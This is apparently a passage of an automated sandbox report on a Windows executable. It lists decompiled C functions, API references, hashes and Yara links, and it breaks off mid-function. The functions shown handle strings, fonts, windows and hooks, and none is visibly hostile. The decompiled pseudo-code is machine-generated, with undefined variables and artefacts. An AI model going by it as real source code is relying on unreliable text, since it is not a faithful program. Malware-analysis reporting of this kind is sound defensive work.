                                          • ??3@YAXPAX@Z.MSVCRT ref: 004083AE
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000010.00000002.708189503.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000010.00000002.708184369.0000000000400000.00000002.00020000.sdmp Download File
                                          • Associated: 00000010.00000002.708207849.000000000041D000.00000002.00020000.sdmp Download File
                                          • Associated: 00000010.00000002.708216748.0000000000422000.00000004.00020000.sdmp Download File
                                          • Associated: 00000010.00000002.708225050.0000000000427000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: memcpy$??3@Itemwsprintf
                                          • String ID: (%d%s)
                                          • API String ID: 1424909225-2087557067
                                          • Opcode ID: 9673e4c991bfaf4a16210ea43dfd6a7d0f0c942b29797aefb73ff1fd45a5a84c
                                          • Instruction ID: 1095c0e5d4e8a60263cd01f69a665fc3e98801ae7abcb9bbd600e73924aed479
                                          • Opcode Fuzzy Hash: 9673e4c991bfaf4a16210ea43dfd6a7d0f0c942b29797aefb73ff1fd45a5a84c
                                          • Instruction Fuzzy Hash: BAF0A9B18002187FDB21BB55DC06EDE77BCEF04704F10456BB552A1492DB75AA448B98
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0040457E, Relevance: 6.1, APIs: 4, Instructions: 92COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 90%
                                          			E0040457E(signed short** __ecx, void* __edi, void* __eflags) {
				signed short* _v8;
				signed short** _v12;
				char _v24;
				char _v36;
				char _v48;
				char _v60;
				void* _t30;
				void* _t33;
				signed int _t37;
				void* _t39;
				signed int _t46;
				signed int _t66;
				signed short* _t72;

				_v12 = __ecx;
				E004147DF(_t30,  &_v24);
				_t72 =  *__ecx;
				_t46 =  *_t72 & 0x0000ffff;
				if(_t46 != 0) {
					_v8 =  &(_t72[2]);
					do {
						if(_t46 != 0x7e) {
							L10:
							E00401585( &_v24, _t46);
							_t72 =  &(_t72[1]);
							_t25 =  &_v8;
							 *_t25 =  &(_v8[1]);
							__eflags =  *_t25;
						} else {
							_t66 = _t72[1] & 0x0000ffff;
							_t76 = _t66 - 0x78;
							if(_t66 != 0x78) {
								L6:
								__eflags = _t66 - 0x58;
								if(__eflags != 0) {
									goto L10;
								} else {
									_t68 = E004032FD(_v8, __eflags);
									__eflags = _t36;
									if(__eflags < 0) {
										goto L10;
									} else {
										_t37 = E004032FD( &(_t72[4]), __eflags);
										__eflags = _t37;
										if(_t37 < 0) {
											goto L10;
										} else {
											E00401585( &_v24, _t68 << 0x00000008 | _t37);
											_t72 =  &(_t72[6]);
											_v8 =  &(_v8[6]);
										}
									}
								}
							} else {
								_t39 = E004032FD(_v8, _t76);
								_t77 = _t39;
								if(_t39 < 0) {
									goto L6;
								} else {
									E004147DF(E004143E4( &_v48, _t39),  &_v36);
									E004148C7( &_v36, E00404346( &_v60,  &_v48, _t77, 0));
									_push(_v60);
									L0041C160();
									E00414962( &_v24, _t77,  &_v36);
									_push(_v36);
									_v8 =  &(_v8[4]);
									_t72 =  &(_t72[4]);
									L0041C160();
									_push(_v48);
									L0041C160();
								}
							}
						}
						_t46 =  *_t72 & 0x0000ffff;
					} while (_t46 != 0);
				}
				_t33 = E004148C7(_v12,  &_v24);
				_push(_v24);
				L0041C160();
				return _t33;
			}
















                                          0x0040458b
                                          0x0040458e
                                          0x00404593
                                          0x00404595
                                          0x0040459b
                                          0x004045a4
                                          0x004045a8
                                          0x004045ac
                                          0x00404654
                                          0x00404658
                                          0x0040465d
                                          0x00404660
                                          0x00404660
                                          0x00404660
                                          0x004045b2
                                          0x004045b2
                                          0x004045b6
                                          0x004045b9
                                          0x0040461e
                                          0x0040461e
                                          0x00404621
                                          0x00000000
                                          0x00404623
                                          0x0040462b
                                          0x0040462d
                                          0x0040462f
                                          0x00000000
                                          0x00404631
                                          0x00404634
                                          0x00404639
                                          0x0040463b
                                          0x00000000
                                          0x0040463d
                                          0x00404646
                                          0x0040464b
                                          0x0040464e
                                          0x0040464e
                                          0x0040463b
                                          0x0040462f
                                          0x004045bb
                                          0x004045be
                                          0x004045c3
                                          0x004045c5
                                          0x00000000
                                          0x004045c7
                                          0x004045d3
                                          0x004045e9
                                          0x004045ee
                                          0x004045f1
                                          0x004045fe
                                          0x00404603
                                          0x00404606
                                          0x0040460a
                                          0x0040460d
                                          0x00404612
                                          0x00404615
                                          0x0040461b
                                          0x004045c5
                                          0x004045b9
                                          0x00404664
                                          0x00404667
                                          0x00404670
                                          0x00404678
                                          0x0040467d
                                          0x00404680
                                          0x00404689

                                          APIs
                                            • Part of subcall function 004147DF: ??2@YAPAXI@Z.MSVCRT ref: 004147E7
                                          • ??3@YAXPAX@Z.MSVCRT ref: 00404680
                                            • Part of subcall function 00404346: MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,00000000,004045E5,00000000,00000000,?,73B749F0,00000000), ref: 00404372
                                            • Part of subcall function 004148C7: ??2@YAPAXI@Z.MSVCRT ref: 004148EF
                                            • Part of subcall function 004148C7: ??3@YAXPAX@Z.MSVCRT ref: 004148F8
                                            • Part of subcall function 004148C7: memcpy.MSVCRT ref: 00414912
                                          • ??3@YAXPAX@Z.MSVCRT ref: 004045F1
                                            • Part of subcall function 00414962: memcpy.MSVCRT ref: 00414985
                                          • ??3@YAXPAX@Z.MSVCRT ref: 0040460D
                                          • ??3@YAXPAX@Z.MSVCRT ref: 00404615
                                          Memory Dump Source
                                          • Source File: 00000010.00000002.708189503.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000010.00000002.708184369.0000000000400000.00000002.00020000.sdmp Download File
                                          • Associated: 00000010.00000002.708207849.000000000041D000.00000002.00020000.sdmp Download File
                                          • Associated: 00000010.00000002.708216748.0000000000422000.00000004.00020000.sdmp Download File
                                          • Associated: 00000010.00000002.708225050.0000000000427000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: ??3@$??2@memcpy$ByteCharMultiWide
                                          • String ID:
                                          • API String ID: 1626065140-0
                                          • Opcode ID: 5e7d55bdcbdcff9f689b1a943d5cefa6c611b1ce7668ccb6363ee27e1066ebe4
                                          • Instruction ID: b0a0a81bb6a2256ad0cd8ca21ba2997bb0ff50e184d4d55abff6c389da77fbe6
                                          • Opcode Fuzzy Hash: 5e7d55bdcbdcff9f689b1a943d5cefa6c611b1ce7668ccb6363ee27e1066ebe4
                                          • Instruction Fuzzy Hash: DB3172B2D001199BCB10FBA5CC928EEB7B4AEA1719B10047FE911731D1EF3D5E44DA28
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00407803, Relevance: 6.1, APIs: 4, Instructions: 56COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 76%
                                          			E00407803(intOrPtr* __ecx, intOrPtr _a4, intOrPtr* _a8) {
				signed int _v8;
				intOrPtr _v16;
				char _v24;
				struct tagLOGFONTW _v500;
				intOrPtr _v504;
				intOrPtr _v508;
				void _v524;
				intOrPtr* _t27;
				void* _t33;
				intOrPtr* _t41;
				intOrPtr _t43;

				_v8 = _v8 & 0x00000000;
				_t41 = __ecx;
				_v524 = 0x1f4;
				if(SystemParametersInfoW(0x29, 0x1f4,  &_v524, 0) != 0) {
					_t43 =  *((intOrPtr*)(_t41 + 0x1c)) + _v508 - 0x1a;
					if(( *0x42245c & 0x00000200) == 0) {
						_t43 = _t43 + GetSystemMetrics(0x31);
					}
					_t33 = CreateFontIndirectW( &_v500);
					if(_t33 != 0) {
						_push(0x860);
						_push(_t33);
						_push( &_v24);
						_push(_a4);
						if( *((intOrPtr*)( *_t41 + 8))() != 0) {
							_t43 = _t43 + _v16;
							_v8 = 1;
						}
						DeleteObject(_t33);
					}
					_t27 = _a8;
					 *_t27 = _t43;
					 *((intOrPtr*)(_t27 + 4)) = _v504;
				}
				return _v8;
			}














                                          0x0040780c
                                          0x00407813
                                          0x00407824
                                          0x00407832
                                          0x00407849
                                          0x0040784d
                                          0x00407857
                                          0x00407857
                                          0x00407866
                                          0x0040786a
                                          0x0040786e
                                          0x00407873
                                          0x00407877
                                          0x00407878
                                          0x00407882
                                          0x00407884
                                          0x00407887
                                          0x00407887
                                          0x0040788f
                                          0x0040788f
                                          0x00407895
                                          0x0040789e
                                          0x004078a1
                                          0x004078a4
                                          0x004078aa

                                          APIs
                                          • SystemParametersInfoW.USER32 ref: 0040782A
                                          • GetSystemMetrics.USER32 ref: 00407851
                                          • CreateFontIndirectW.GDI32(?), ref: 00407860
                                          • DeleteObject.GDI32(00000000), ref: 0040788F
                                          Memory Dump Source
                                          • Source File: 00000010.00000002.708189503.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000010.00000002.708184369.0000000000400000.00000002.00020000.sdmp Download File
                                          • Associated: 00000010.00000002.708207849.000000000041D000.00000002.00020000.sdmp Download File
                                          • Associated: 00000010.00000002.708216748.0000000000422000.00000004.00020000.sdmp Download File
                                          • Associated: 00000010.00000002.708225050.0000000000427000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: System$CreateDeleteFontIndirectInfoMetricsObjectParameters
                                          • String ID:
                                          • API String ID: 1900162674-0
                                          • Opcode ID: 6b0baed25e051eef8abb3c10058c87645c9df880ae66aa92677688f43f21874f
                                          • Instruction ID: 6ed76f481bb13851b2ba6c7269299cba647cb843460d982c1d226789c05f16d1
                                          • Opcode Fuzzy Hash: 6b0baed25e051eef8abb3c10058c87645c9df880ae66aa92677688f43f21874f
                                          • Instruction Fuzzy Hash: 6E1133B6E00219EFDB109F54DD88FEAB7B8EB08304F04806AED15A7291DB74AE44CF55
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00404475, Relevance: 6.0, APIs: 4, Instructions: 47COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 83%
                                          			E00404475(WCHAR** __ecx) {
				char _v16;
				void* _t8;
				long _t11;
				long _t12;
				void* _t17;
				void* _t29;
				WCHAR* _t30;
				WCHAR** _t32;

				_t32 = __ecx;
				E004147DF(_t8,  &_v16);
				_t30 =  *__ecx;
				_t11 = ExpandEnvironmentStringsW(_t30, E0040420B( &_v16, _t29, 1), 1);
				if(_t11 != 0) {
					_t12 = _t11 + 1;
					ExpandEnvironmentStringsW( *_t32, E0040420B( &_v16, _t29, _t12), _t12);
					E004041F0( &_v16);
					_t17 = E004148C7(_t32,  &_v16);
					_push(_v16);
					L0041C160();
					return _t17;
				}
				_push(_v16);
				L0041C160();
				return _t11;
			}











                                          0x0040447c
                                          0x00404482
                                          0x00404487
                                          0x0040449d
                                          0x004044a1
                                          0x004044b1
                                          0x004044be
                                          0x004044c3
                                          0x004044ce
                                          0x004044d3
                                          0x004044d6
                                          0x00000000
                                          0x004044dc
                                          0x004044a3
                                          0x004044a6
                                          0x00000000

                                          APIs
                                            • Part of subcall function 004147DF: ??2@YAPAXI@Z.MSVCRT ref: 004147E7
                                            • Part of subcall function 0040420B: wcsncpy.MSVCRT ref: 00404239
                                            • Part of subcall function 0040420B: ??3@YAXPAX@Z.MSVCRT ref: 00404244
                                          • ExpandEnvironmentStringsW.KERNEL32(00000000,00000000,00000001,00000001,00000000,?,00000000,00000000,?), ref: 0040449D
                                          • ??3@YAXPAX@Z.MSVCRT ref: 004044A6
                                          • ExpandEnvironmentStringsW.KERNEL32(00000000,00000000,00000001,00000001,00000000), ref: 004044BE
                                          • ??3@YAXPAX@Z.MSVCRT ref: 004044D6
                                          Memory Dump Source
                                          • Source File: 00000010.00000002.708189503.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000010.00000002.708184369.0000000000400000.00000002.00020000.sdmp Download File
                                          • Associated: 00000010.00000002.708207849.000000000041D000.00000002.00020000.sdmp Download File
                                          • Associated: 00000010.00000002.708216748.0000000000422000.00000004.00020000.sdmp Download File
                                          • Associated: 00000010.00000002.708225050.0000000000427000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: ??3@$EnvironmentExpandStrings$??2@wcsncpy
                                          • String ID:
                                          • API String ID: 3034541985-0
                                          • Opcode ID: a1201e00ebbe42c888554cef6be3fc7eae31bc125472a15e7d02ceddf66335d8
                                          • Instruction ID: 6aaab2933dda83b848260475bd0ce4bd17d474790b6213925c89a090bfd6a3a1
                                          • Opcode Fuzzy Hash: a1201e00ebbe42c888554cef6be3fc7eae31bc125472a15e7d02ceddf66335d8
                                          • Instruction Fuzzy Hash: 69F086B19001087ED714B755EC52DEE73BCDF80714B20417FF511B2092DB746D458A68
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00408CE2, Relevance: 6.0, APIs: 4, Instructions: 47COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 94%
                                          			E00408CE2(int _a4, int _a8, struct tagPOINT* _a12) {
				struct tagRECT _v20;
				intOrPtr _t11;
				intOrPtr _t16;
				intOrPtr _t21;
				intOrPtr _t22;
				intOrPtr* _t23;
				struct tagPOINT* _t25;

				_t11 =  *0x4228b4; // 0x0
				if(_t11 == 0) {
					return 0;
				}
				_t25 = _a12;
				if( *((intOrPtr*)(_t11 + 0x48)) <= 0) {
					L9:
					return CallNextHookEx( *0x4228b8, _a4, _a8, _t25);
				}
				_t21 =  *0x422600; // 0x202
				_t23 = 0x422600;
				while(_t21 != 0) {
					if(_t21 == _a8) {
						ScreenToClient( *(_t11 + 4), _t25);
						_t16 =  *0x4228b4; // 0x0
						GetClientRect( *(_t16 + 4),  &_v20);
						_push(_t25->y);
						if(PtInRect( &_v20,  *_t25) != 0) {
							_t22 =  *0x4228b4; // 0x0
							E0040846F(_t22);
						}
						goto L9;
					}
					_t23 = _t23 + 4;
					_t21 =  *_t23;
				}
				goto L9;
			}










                                          0x00408ce5
                                          0x00408cef
                                          0x00000000
                                          0x00408d68
                                          0x00408cf6
                                          0x00408cf9
                                          0x00408d52
                                          0x00000000
                                          0x00408d65
                                          0x00408cfb
                                          0x00408d01
                                          0x00408d12
                                          0x00408d0b
                                          0x00408d1c
                                          0x00408d26
                                          0x00408d2e
                                          0x00408d34
                                          0x00408d45
                                          0x00408d47
                                          0x00408d4d
                                          0x00408d4d
                                          0x00000000
                                          0x00408d45
                                          0x00408d0d
                                          0x00408d10
                                          0x00408d10
                                          0x00000000

                                          APIs
                                          • ScreenToClient.USER32 ref: 00408D1C
                                          • GetClientRect.USER32 ref: 00408D2E
                                          • PtInRect.USER32(?,?,?), ref: 00408D3D
                                            • Part of subcall function 0040846F: KillTimer.USER32(?,00000001,?,00408D52), ref: 0040847D
                                          • CallNextHookEx.USER32 ref: 00408D5F
                                          Memory Dump Source
                                          • Source File: 00000010.00000002.708189503.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000010.00000002.708184369.0000000000400000.00000002.00020000.sdmp Download File
                                          • Associated: 00000010.00000002.708207849.000000000041D000.00000002.00020000.sdmp Download File
                                          • Associated: 00000010.00000002.708216748.0000000000422000.00000004.00020000.sdmp Download File
                                          • Associated: 00000010.00000002.708225050.0000000000427000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: ClientRect$CallHookKillNextScreenTimer
                                          • String ID:
                                          • API String ID: 3015594791-0
                                          • Opcode ID: 993c2614d7880d53dfabe33bba4063a44cb0ef45497057784dd9015b7f499a48
                                          • Instruction ID: 3a3e0b2ee197b87f3047a46ed79295dbf0db4e011d250cd12eb6af0489ec551e
                                          • Opcode Fuzzy Hash: 993c2614d7880d53dfabe33bba4063a44cb0ef45497057784dd9015b7f499a48
                                          • Instruction Fuzzy Hash: 8001AD31200109EFDF24EF64DE45EAA7BA5FF14300704863EE895A22B0DB78E811DB19
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00404B33, Relevance: 6.0, APIs: 4, Instructions: 39COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 73%
                                          			E00404B33(struct HWND__* __ecx) {
				WCHAR* _v16;
				char _v28;
				char _v40;
				int _t19;
				struct HWND__* _t31;
				void* _t33;

				_t31 = __ecx;
				E00404AF5( &_v16, __ecx, _t33);
				E00405546( &_v16, _t33);
				E00414803( &_v40, "%");
				E00414803( &_v28, L"%^");
				E00414BA6( &_v16,  &_v28,  &_v40);
				_push(_v28);
				L0041C160();
				_push(_v40);
				L0041C160();
				_t19 = SetWindowTextW(_t31, _v16);
				_push(_v16);
				L0041C160();
				return _t19;
			}









                                          0x00404b3a
                                          0x00404b41
                                          0x00404b49
                                          0x00404b56
                                          0x00404b63
                                          0x00404b73
                                          0x00404b78
                                          0x00404b7b
                                          0x00404b80
                                          0x00404b83
                                          0x00404b8e
                                          0x00404b94
                                          0x00404b99
                                          0x00404ba3

                                          APIs
                                            • Part of subcall function 00404AF5: GetWindowTextLengthW.USER32(?), ref: 00404B02
                                            • Part of subcall function 00404AF5: GetWindowTextW.USER32 ref: 00404B1C
                                            • Part of subcall function 00414803: memcpy.MSVCRT ref: 00414829
                                          • ??3@YAXPAX@Z.MSVCRT ref: 00404B7B
                                          • ??3@YAXPAX@Z.MSVCRT ref: 00404B83
                                          • SetWindowTextW.USER32(?,?), ref: 00404B8E
                                          • ??3@YAXPAX@Z.MSVCRT ref: 00404B99
                                          Memory Dump Source
                                          • Source File: 00000010.00000002.708189503.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000010.00000002.708184369.0000000000400000.00000002.00020000.sdmp Download File
                                          • Associated: 00000010.00000002.708207849.000000000041D000.00000002.00020000.sdmp Download File
                                          • Associated: 00000010.00000002.708216748.0000000000422000.00000004.00020000.sdmp Download File
                                          • Associated: 00000010.00000002.708225050.0000000000427000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: ??3@TextWindow$Lengthmemcpy
                                          • String ID:
                                          • API String ID: 396479319-0
                                          • Opcode ID: ef16cb83b1a7ed00dcace484179177180cb7813ae2e53c30f1211cb97c3539ec
                                          • Instruction ID: 19ea8e6cb93d9cd3ba04d51c560a34885da5182b26a5070d63b94fab34289d6b
                                          • Opcode Fuzzy Hash: ef16cb83b1a7ed00dcace484179177180cb7813ae2e53c30f1211cb97c3539ec
                                          • Instruction Fuzzy Hash: AFF0E176D440187ACB05FBD5EC438DEB7B99E44708B2041ABF501B2095DE756E85CA9C
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00414283, Relevance: 6.0, APIs: 4, Instructions: 37COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 64%
                                          			E00414283(void** __ecx, void* _a4) {
				void* _v0;
				void* _v20;
				void* _t14;
				void* _t16;
				void* _t19;
				void* _t21;
				void* _t22;
				void** _t23;
				void* _t26;
				void* _t27;
				void** _t28;
				void** _t29;

				_t23 = __ecx;
				_t26 = _a4;
				_t28 = __ecx;
				if(_t26 < __ecx[1] || _t26 >= 0x40000000) {
					_push(0x41fbdc);
					_push( &_a4);
					_a4 = 0x13329ac;
					L0041C310();
					asm("int3");
					_t21 = _v20;
					_push(_t28);
					_push(_t26);
					_t29 = _t23;
					if(_t21 >= 0x40000000) {
						_push(0x41fbdc);
						_push( &_v0);
						_v0 = 0x13329ac;
						L0041C310();
					}
					_t11 = _t21 + 1; // 0x13329ad
					_t14 = _t11;
					_push(_t14);
					L0041C16C();
					_t27 = _t14;
					 *_t27 = 0;
					_push( *_t29);
					L0041C160();
					 *_t29 = _t27;
					_t29[2] = _t21;
					return _t14;
				} else {
					_t16 = _t26 + 1;
					_push(_t16);
					L0041C16C();
					_t22 = _t16;
					_t19 = memcpy(_t22,  *__ecx, __ecx[1] + 1);
					_push( *_t28);
					L0041C160();
					_t28[2] = _t26;
					 *_t28 = _t22;
					return _t19;
				}
			}















                                          0x00414283
                                          0x00414289
                                          0x0041428c
                                          0x00414291
                                          0x004142c9
                                          0x004142d1
                                          0x004142d2
                                          0x004142d9
                                          0x004142de
                                          0x004142e3
                                          0x004142e6
                                          0x004142e7
                                          0x004142e8
                                          0x004142f0
                                          0x004142f2
                                          0x004142fa
                                          0x004142fb
                                          0x00414302
                                          0x00414302
                                          0x00414307
                                          0x00414307
                                          0x0041430a
                                          0x0041430b
                                          0x00414310
                                          0x00414312
                                          0x00414315
                                          0x00414317
                                          0x0041431e
                                          0x00414321
                                          0x00414327
                                          0x0041429b
                                          0x0041429b
                                          0x0041429e
                                          0x0041429f
                                          0x004142a4
                                          0x004142ae
                                          0x004142b3
                                          0x004142b5
                                          0x004142bd
                                          0x004142c1
                                          0x004142c6
                                          0x004142c6

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000010.00000002.708189503.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000010.00000002.708184369.0000000000400000.00000002.00020000.sdmp Download File
                                          • Associated: 00000010.00000002.708207849.000000000041D000.00000002.00020000.sdmp Download File
                                          • Associated: 00000010.00000002.708216748.0000000000422000.00000004.00020000.sdmp Download File
                                          • Associated: 00000010.00000002.708225050.0000000000427000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: ??2@??3@ExceptionThrowmemcpy
                                          • String ID:
                                          • API String ID: 3462485524-0
                                          • Opcode ID: 57869b70c59cb2356f85a24d65bfeaea13d2154f7f3406d0e59cf26c877a280c
                                          • Instruction ID: 5b66cd78a0db593bdef5d09f9cd12a00abbc121f78fce6118f4eaf4c7a2e81d2
                                          • Opcode Fuzzy Hash: 57869b70c59cb2356f85a24d65bfeaea13d2154f7f3406d0e59cf26c877a280c
                                          • Instruction Fuzzy Hash: 6DF0BB75140208BFC710DF55DCC198BF7EDEF54798711492FF94583102D275A8C48BA8
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0040C140, Relevance: 6.0, APIs: 2, Strings: 2, Instructions: 34COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 91%
                                          			E0040C140(void* __ebx, intOrPtr* __ecx, void* __eflags) {
				void* _t3;
				void* _t7;
				intOrPtr* _t15;
				intOrPtr* _t16;

				_t15 = __ecx;
				EnterCriticalSection(0x4249f8);
				_t16 = _t15 + 0x10;
				if(E0040BEA0(_t16) != 0) {
					L4:
					_push(_t16);
					_t3 = E0040C0D0(0x422628);
				} else {
					_t7 = E0040BEA0(_t16);
					if(_t7 == 0) {
						E0040B810(_t16);
					}
					_t3 = E0040BFD0(_t15, _t16);
					if(_t7 == 0) {
						goto L4;
					}
				}
				LeaveCriticalSection(0x4249f8);
				return _t3;
			}







                                          0x0040c147
                                          0x0040c149
                                          0x0040c14f
                                          0x0040c15c
                                          0x0040c184
                                          0x0040c184
                                          0x0040c18a
                                          0x0040c15e
                                          0x0040c16a
                                          0x0040c16e
                                          0x0040c172
                                          0x0040c172
                                          0x0040c17a
                                          0x0040c182
                                          0x00000000
                                          0x00000000
                                          0x0040c182
                                          0x0040c194
                                          0x0040c19c

                                          APIs
                                          • EnterCriticalSection.KERNEL32(004249F8,?,?,0040C1CF,?,?,?,?,?,0041CA20,000000FF), ref: 0040C149
                                          • LeaveCriticalSection.KERNEL32(004249F8,?,?,?,?,0040C1CF,?,?,?,?,?,0041CA20,000000FF), ref: 0040C194
                                            • Part of subcall function 0040BEA0: memmove.MSVCRT ref: 0040BF0B
                                            • Part of subcall function 0040B810: memset.MSVCRT ref: 0040B869
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000010.00000002.708189503.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000010.00000002.708184369.0000000000400000.00000002.00020000.sdmp Download File
                                          • Associated: 00000010.00000002.708207849.000000000041D000.00000002.00020000.sdmp Download File
                                          • Associated: 00000010.00000002.708216748.0000000000422000.00000004.00020000.sdmp Download File
                                          • Associated: 00000010.00000002.708225050.0000000000427000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: CriticalSection$EnterLeavememmovememset
                                          • String ID: (&B$(&B
                                          • API String ID: 2443406628-3506096430
                                          • Opcode ID: f016356fa7e24247763b21a98c0f9a686db0cf529d991d74a4701e524a56e4fd
                                          • Instruction ID: 853edd7aaeb107b7cb5601c09f28b255d6913e1c7a09ba2968700e737119d554
                                          • Opcode Fuzzy Hash: f016356fa7e24247763b21a98c0f9a686db0cf529d991d74a4701e524a56e4fd
                                          • Instruction Fuzzy Hash: B6E08C71382121628A1533393C55AFA261EDEC6348B45023BB6417B2C2CFAD184786FD
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00408183, Relevance: 6.0, APIs: 4, Instructions: 34windowCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 100%
                                          			E00408183(void* __ecx) {
				struct tagLOGFONTW _v96;
				int _t8;
				long _t11;
				int _t15;

				if(( *0x42245c & 0x00000010) != 0) {
					_t8 = GetObjectW( *(__ecx + 0x34), 0x5c,  &_v96);
					if(_t8 != 0) {
						_v96.lfWeight = 0x2bc;
						_t11 = CreateFontIndirectW( &_v96);
						_t15 = _t11;
						if(_t15 != 0) {
							_t11 = SendMessageW(GetDlgItem( *(__ecx + 4), 0x4b5), 0x30, _t15, 0);
						}
						return _t11;
					}
				}
				return _t8;
			}







                                          0x00408193
                                          0x0040819e
                                          0x004081a6
                                          0x004081ad
                                          0x004081b4
                                          0x004081ba
                                          0x004081be
                                          0x004081d4
                                          0x004081d4
                                          0x00000000
                                          0x004081da
                                          0x004081a6
                                          0x004081dd

                                          APIs
                                          • GetObjectW.GDI32(?,0000005C,?), ref: 0040819E
                                          • CreateFontIndirectW.GDI32(?), ref: 004081B4
                                          • GetDlgItem.USER32 ref: 004081C8
                                          • SendMessageW.USER32(00000000,00000030,00000000,00000000), ref: 004081D4
                                          Memory Dump Source
                                          • Source File: 00000010.00000002.708189503.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000010.00000002.708184369.0000000000400000.00000002.00020000.sdmp Download File
                                          • Associated: 00000010.00000002.708207849.000000000041D000.00000002.00020000.sdmp Download File
                                          • Associated: 00000010.00000002.708216748.0000000000422000.00000004.00020000.sdmp Download File
                                          • Associated: 00000010.00000002.708225050.0000000000427000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: CreateFontIndirectItemMessageObjectSend
                                          • String ID:
                                          • API String ID: 2001801573-0
                                          • Opcode ID: afbff07d09dddf9371f97f906327bbbd58aa03dbd1351fda712479fe90e32f0f
                                          • Instruction ID: d5b718cc934acb00f13f44d7e909b03c4c551f7785cdaa53379e29aff312fd17
                                          • Opcode Fuzzy Hash: afbff07d09dddf9371f97f906327bbbd58aa03dbd1351fda712479fe90e32f0f
                                          • Instruction Fuzzy Hash: 70F054B5900714ABD7205B94DD09F8B7BACAF48B15F048039AD52E51D5DBB4D4068B28
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 004038D4, Relevance: 6.0, APIs: 4, Instructions: 27COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 100%
                                          			E004038D4(struct HWND__* __ecx, struct tagPOINT* __edx) {
				struct HWND__* _t1;
				struct HWND__* _t7;
				struct HWND__* _t10;
				struct tagPOINT* _t12;

				_t10 = __ecx;
				_t12 = __edx;
				_t1 = GetParent(__ecx);
				_t7 = _t1;
				if(_t7 != 0) {
					GetWindowRect(_t10, _t12);
					ScreenToClient(_t7, _t12);
					ScreenToClient(_t7, _t12 + 8);
					return 1;
				}
				return _t1;
			}







                                          0x004038d7
                                          0x004038da
                                          0x004038dc
                                          0x004038e2
                                          0x004038e6
                                          0x004038ea
                                          0x004038f8
                                          0x004038ff
                                          0x00000000
                                          0x00403903
                                          0x00403907

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000010.00000002.708189503.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000010.00000002.708184369.0000000000400000.00000002.00020000.sdmp Download File
                                          • Associated: 00000010.00000002.708207849.000000000041D000.00000002.00020000.sdmp Download File
                                          • Associated: 00000010.00000002.708216748.0000000000422000.00000004.00020000.sdmp Download File
                                          • Associated: 00000010.00000002.708225050.0000000000427000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: ClientScreen$ParentRectWindow
                                          • String ID:
                                          • API String ID: 2099118873-0
                                          • Opcode ID: 4c92e9c479757e8e066bde25e06fea40a487b1c64e9eb2093d4279233fbb5f16
                                          • Instruction ID: 3d7e383402d4b386d472006189a1f244a9290001d11243c4274d9f08879646a2
                                          • Opcode Fuzzy Hash: 4c92e9c479757e8e066bde25e06fea40a487b1c64e9eb2093d4279233fbb5f16
                                          • Instruction Fuzzy Hash: F5E012B7A012256B931427B76C88CEB9F5CDDD65763064476F919D2210C9B8DC0185B4
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 004059A3, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 81COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 73%
                                          			E004059A3(intOrPtr __ecx, void* __edx, void* __eflags, signed short* _a4, char _a7, signed int _a8) {
				signed int _v8;
				intOrPtr _v12;
				char _v24;
				void* _t23;
				signed int _t25;
				signed int _t27;
				void* _t34;
				signed short* _t48;
				signed short* _t49;

				_v12 = __ecx;
				_t34 = __edx;
				E004147DF(_t23,  &_v24);
				_t48 = _a4;
				_t49 = _t48;
				_a7 = 0;
				while(1) {
					L1:
					_t25 =  *_t49 & 0x0000ffff;
					if(_t25 >= 0x30 && _t25 <= 0x39) {
					}
					L9:
					E00414864( &_v24, _t34);
					E00401585( &_v24,  *_t49 & 0x0000ffff);
					_v8 = _v8 & 0x00000000;
					_t49 =  &(_t49[1]);
					if(E00404F59() == 0) {
						L1:
						_t25 =  *_t49 & 0x0000ffff;
						if(_t25 >= 0x30 && _t25 <= 0x39) {
						}
						goto L3;
					} else {
						L10:
